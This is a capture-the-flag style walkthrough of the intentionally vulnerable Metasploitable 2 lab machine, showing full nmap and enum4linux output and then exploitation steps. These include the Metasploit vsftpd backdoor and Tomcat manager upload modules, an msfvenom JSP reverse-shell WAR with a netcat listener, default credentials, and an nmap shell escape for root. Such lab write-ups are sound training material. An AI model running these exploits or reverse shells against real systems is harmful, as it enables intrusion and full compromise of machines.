Metasploitable-2 Walkthrough

Metasploitable-2 Walkthrough

CTF Writeup: Metasploitable-2 - Full Walkthrough

1. Introduction:

Metasploitable 2 is an intentionally vulnerable Linux virtual machine developed by Rapid7 . This walkthrough is crafted to build a deeper pentesting mindset by explaining the enumeration, exploitation, and privilege escalation steps in a methodical and educational manner.

2. Lab Setup:

  • Attacker: Kali Linux (or ParrotSec)
  • Target: Metasploitable 2 (Ubuntu 8.04)
  • Network: Host-only or Bridged
  • Default login credentials: msfadmin:msfadmin

Find the victim's IP address using 'ifconfig' command:

Check IP connectivity:

ping <target_ip>



3. Recon & Enumeration

🔍 Full Nmap Scan

nmap -sC -sV <target-ip> -oN nmap_scan

This reveals all open ports and services. Always save your scans.

# Nmap 7.95 scan initiated Wed Aug  6 12:30:24 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -oN nmap_scan 192.168.56.105
Nmap scan report for 192.168.56.105
Host is up (0.00021s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
|_ssl-date: 2025-08-06T07:00:54+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      50438/tcp   mountd
|   100005  1,2,3      53022/udp   mountd
|   100021  1,3,4      33887/tcp   nlockmgr
|   100021  1,3,4      46746/udp   nlockmgr
|   100024  1          42734/tcp   status
|_  100024  1          44679/udp   status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  shell       Netkit rshd
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsCompression, LongColumnFlag, SupportsTransactions, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, Support41Auth, ConnectWithDatabase
|   Status: Autocommit
|_  Salt: $?OQ'nt~>X!9:V"F{X)^
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2025-08-06T07:00:54+00:00; -1s from scanner time.
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:52:78:1E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2025-08-06T03:00:36-04:00
|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: -1s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug  6 12:31:15 2025 -- 1 IP address (1 host up) scanned in 51.46 seconds

  



4. Service Exploitation

🎯 FTP Exploit (vsftpd 2.3.4):

  • Check anonymous login
  • telnet <target_ip> 21

    Step 1: FTP Login using credentials msfadmin:msfadmin :

    ftp <target_ip> 21

    Step 2: Use Metasploit Framework to exploit FTP (vsftpd 2.3.4)

    msfconsole
    search vsftpd
    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOSTS <target_ip>
    run

    Here we got the root access by exploiting FTP using the Metasploit Framework.




    2. Telnet Exploitation (Port 23)

    We can connect to telnet using the command telnet :

    telnet <taget_ip>



    🎯 Web Applications (DVWA, phpMyAdmin):

    • Explore apps at http://<target-ip>/
    • Use default creds in phpMyAdmin
    • Practice SQLi and RCE in DVWA

    Login DVWA via default credentials admin:password .

    XSS Cross Site Scripting:

    SQL Injections :




    🎯 Samba Enumeration:

    enum4linux -a <target-ip>

    Here is the full output:

    Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Aug  6 13:16:16 2025
    
     =========================================( Target Information )=========================================
    
    Target ........... 192.168.56.105
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ===========================( Enumerating Workgroup/Domain on 192.168.56.105 )===========================
    
    
    [+] Got domain/workgroup name: WORKGROUP
    
    
     ===============================( Nbtstat Information for 192.168.56.105 )===============================
    
    Looking up status of 192.168.56.105
    	METASPLOITABLE  <00> -         B <ACTIVE>  Workstation Service
    	METASPLOITABLE  <03> -         B <ACTIVE>  Messenger Service
    	METASPLOITABLE  <20> -         B <ACTIVE>  File Server Service
    	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
    	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
    
    	MAC Address = 00-00-00-00-00-00
    
     ==================================( Session Check on 192.168.56.105 )==================================
    
    
    [+] Server 192.168.56.105 allows sessions using username '', password ''
    
    
     ===============================( Getting domain SID for 192.168.56.105 )===============================
    
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    
    [+] Can't determine if host is part of domain or part of a workgroup
    
    
     ==================================( OS information on 192.168.56.105 )==================================
    
    
    [E] Can't get OS info with smbclient
    
    
    [+] Got OS info for 192.168.56.105 from srvinfo: 
    	METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
    	platform_id     :	500
    	os version      :	4.9
    	server type     :	0x9a03
    
    
     ======================================( Users on 192.168.56.105 )======================================
    
    index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games	Name: games	Desc: (null)
    index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody	Name: nobody	Desc: (null)
    index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind	Name: (null)	Desc: (null)
    index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy	Name: proxy	Desc: (null)
    index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog	Name: (null)	Desc: (null)
    index: 0x6 RID: 0xbba acb: 0x00000010 Account: user	Name: just a user,111,,	Desc: (null)
    index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data	Name: www-data	Desc: (null)
    index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root	Name: root	Desc: (null)
    index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news	Name: news	Desc: (null)
    index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres	Name: PostgreSQL administrator,,,	Desc: (null)
    index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin	Name: bin	Desc: (null)
    index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail	Name: mail	Desc: (null)
    index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd	Name: (null)	Desc: (null)
    index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd	Name: (null)	Desc: (null)
    index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp	Name: (null)	Desc: (null)
    index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon	Name: daemon	Desc: (null)
    index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd	Name: (null)	Desc: (null)
    index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man	Name: man	Desc: (null)
    index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp	Name: lp	Desc: (null)
    index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql	Name: MySQL Server,,,	Desc: (null)
    index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats	Name: Gnats Bug-Reporting System (admin)	Desc: (null)
    index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid	Name: (null)	Desc: (null)
    index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup	Name: backup	Desc: (null)
    index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin	Name: msfadmin,,,	Desc: (null)
    index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd	Name: (null)	Desc: (null)
    index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys	Name: sys	Desc: (null)
    index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog	Name: (null)	Desc: (null)
    index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix	Name: (null)	Desc: (null)
    index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service	Name: ,,,	Desc: (null)
    index: 0x1e RID: 0x434 acb: 0x00000011 Account: list	Name: Mailing List Manager	Desc: (null)
    index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc	Name: ircd	Desc: (null)
    index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp	Name: (null)	Desc: (null)
    index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55	Name: (null)	Desc: (null)
    index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync	Name: sync	Desc: (null)
    index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp	Name: uucp	Desc: (null)
    
    user:[games] rid:[0x3f2]
    user:[nobody] rid:[0x1f5]
    user:[bind] rid:[0x4ba]
    user:[proxy] rid:[0x402]
    user:[syslog] rid:[0x4b4]
    user:[user] rid:[0xbba]
    user:[www-data] rid:[0x42a]
    user:[root] rid:[0x3e8]
    user:[news] rid:[0x3fa]
    user:[postgres] rid:[0x4c0]
    user:[bin] rid:[0x3ec]
    user:[mail] rid:[0x3f8]
    user:[distccd] rid:[0x4c6]
    user:[proftpd] rid:[0x4ca]
    user:[dhcp] rid:[0x4b2]
    user:[daemon] rid:[0x3ea]
    user:[sshd] rid:[0x4b8]
    user:[man] rid:[0x3f4]
    user:[lp] rid:[0x3f6]
    user:[mysql] rid:[0x4c2]
    user:[gnats] rid:[0x43a]
    user:[libuuid] rid:[0x4b0]
    user:[backup] rid:[0x42c]
    user:[msfadmin] rid:[0xbb8]
    user:[telnetd] rid:[0x4c8]
    user:[sys] rid:[0x3ee]
    user:[klog] rid:[0x4b6]
    user:[postfix] rid:[0x4bc]
    user:[service] rid:[0xbbc]
    user:[list] rid:[0x434]
    user:[irc] rid:[0x436]
    user:[ftp] rid:[0x4be]
    user:[tomcat55] rid:[0x4c4]
    user:[sync] rid:[0x3f0]
    user:[uucp] rid:[0x3fc]
    
     ================================( Share Enumeration on 192.168.56.105 )================================
    
    
    	Sharename       Type      Comment
    	---------       ----      -------
    	print$          Disk      Printer Drivers
    	tmp             Disk      oh noes!
    	opt             Disk      
    	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
    	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
    Reconnecting with SMB1 for workgroup listing.
    
    	Server               Comment
    	---------            -------
    
    	Workgroup            Master
    	---------            -------
    	WORKGROUP            METASPLOITABLE
    
    [+] Attempting to map shares on 192.168.56.105
    
    //192.168.56.105/print$	Mapping: DENIED Listing: N/A Writing: N/A
    //192.168.56.105/tmp	Mapping: OK Listing: OK Writing: N/A
    //192.168.56.105/opt	Mapping: DENIED Listing: N/A Writing: N/A
    
    [E] Can't understand response:
    
    NT_STATUS_NETWORK_ACCESS_DENIED listing \*
    //192.168.56.105/IPC$	Mapping: N/A Listing: N/A Writing: N/A
    //192.168.56.105/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
    
     ===========================( Password Policy Information for 192.168.56.105 )===========================
    
    
    
    [+] Attaching to 192.168.56.105 using a NULL share
    
    [+] Trying protocol 139/SMB...
    
    [+] Found domain(s):
    
    	[+] METASPLOITABLE
    	[+] Builtin
    
    [+] Password Info for Domain: METASPLOITABLE
    
    	[+] Minimum password length: 5
    	[+] Password history length: None
    	[+] Maximum password age: Not Set
    	[+] Password Complexity Flags: 000000
    
    		[+] Domain Refuse Password Change: 0
    		[+] Domain Password Store Cleartext: 0
    		[+] Domain Password Lockout Admins: 0
    		[+] Domain Password No Clear Change: 0
    		[+] Domain Password No Anon Change: 0
    		[+] Domain Password Complex: 0
    
    	[+] Minimum password age: None
    	[+] Reset Account Lockout Counter: 30 minutes 
    	[+] Locked Account Duration: 30 minutes 
    	[+] Account Lockout Threshold: None
    	[+] Forced Log off Time: Not Set
    
    
    
    [+] Retieved partial password policy with rpcclient:
    
    
    Password Complexity: Disabled
    Minimum Password Length: 0
    
    
     ======================================( Groups on 192.168.56.105 )======================================
    
    
    [+] Getting builtin groups:
    
    
    [+]  Getting builtin group memberships:
    
    
    [+]  Getting local groups:
    
    
    [+]  Getting local group memberships:
    
    
    [+]  Getting domain groups:
    
    
    [+]  Getting domain group memberships:
    
    
     =================( Users on 192.168.56.105 via RID cycling (RIDS: 500-550,1000-1050) )=================
    
    
    [I] Found new SID: 
    S-1-5-21-1042354039-2475377354-766472396
    
    [+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''
    
    S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
    S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
    S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)
    
     ==============================( Getting printer info for 192.168.56.105 )==============================
    
    No printers returned.
    
    
    enum4linux complete on Wed Aug  6 13:16:24 2025
     



    🎯 PostgreSQL & MySQL:

    Try default creds like postgres:postgres and root with no password.

    We will do the exploitation thing using the Metasploit Framework again. For that start the MSF using the command msfconsole . Set RHOSTS and LHOST options.
    set RHOSTS <target_ip>
    set LHOST <your_ip>
    run



    🎯 Apache Tomcat Exploitation (port 8180):

    Method 1 : Search for apache tomcat on MSF and use the payload on 13th number.

    search apache tomcat 
    use exploit/multi/http/tomcat_mgr_upload
    set RHOST <target_ip>
    set RPORT 8180
    set LHOST <your_ip>
    set HttpUsername tomcat
    set HttpPassword tomcat 
    run




    Method 2 : Explore WAR file deployment and Netcat listeners.

    First create the shell.war payload using msfvenom :

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Target-IP> LPORT=4444 -f war > shell.war
    

    Listen on port 4444 for incoming connections:

    nc -lvnp 4444
    

    After doing this, go to http://<target_ip>:8180/manager/html and login using credentials tomcat:tomcat .

    Deploy the shell.war file and go to htpp://<target_ip>/shell .

    You will receive the connection on the Netcat listener.




    5. Privilege Escalation:

    • Check kernel version: uname -a
  • Look for exploits like Dirty COW or weak sudo rules
  • We can also use GTFOBins to get root access.
  • nmap --interactive
    nmap> !sh
    



    6. Lessons Learned:

    • Deep enumeration reveals multiple entry points
    • Default credentials are dangerous
    • Manual exploitation improves understanding over Metasploit reliance

    7. References

    Check out my medium blog: Metasploitable-2